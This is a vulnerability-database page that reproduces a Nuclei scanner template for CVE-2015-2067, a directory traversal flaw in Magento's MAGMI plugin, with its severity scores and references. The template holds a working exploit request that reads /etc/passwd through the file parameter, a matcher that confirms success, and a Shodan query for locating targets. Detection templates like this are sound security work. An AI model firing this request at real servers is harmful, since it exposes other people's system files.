Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-2067
HistoryOct 11, 2021 - 11:24 a.m.

Magento Server MAGMI - Directory Traversal

2021-10-1111:24:36
ProjectDiscovery
github.com
4

6.4 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.007 Low

EPSS

Percentile

80.3%

Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a … (dot dot) in the file parameter.

id: CVE-2015-2067

info:
  name: Magento Server MAGMI - Directory Traversal
  author: daffainfo
  severity: medium
  description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
  impact: |
    An attacker can exploit this vulnerability to read arbitrary files on the server.
  remediation: |
    Apply the latest security patches and updates provided by Magento.
  reference:
    - https://www.exploit-db.com/exploits/35996
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2067
    - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
    cvss-score: 5
    cve-id: CVE-2015-2067
    cwe-id: CWE-22
    epss-score: 0.00709
    epss-percentile: 0.79991
    cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
  metadata:
    max-request: 1
    vendor: magmi_project
    product: magmi
    framework: magento_server
    shodan-query: http.component:"Magento"
  tags: cve2015,cve,plugin,edb,packetstorm,lfi,magento,magmi,magmi_project,magento_server

http:
  - method: GET
    path:
      - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210098c40f6c8c0649ca609f84e623426e75d8b4585cd3c8a8170af7ad182b173602022039dd4d44ad7c15033383f04ab8c95596af9694c2bd91a5d278cd8c0211408051:922c64590222798bb761d5b6d8e72950

6.4 Medium

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.007 Low

EPSS

Percentile

80.3%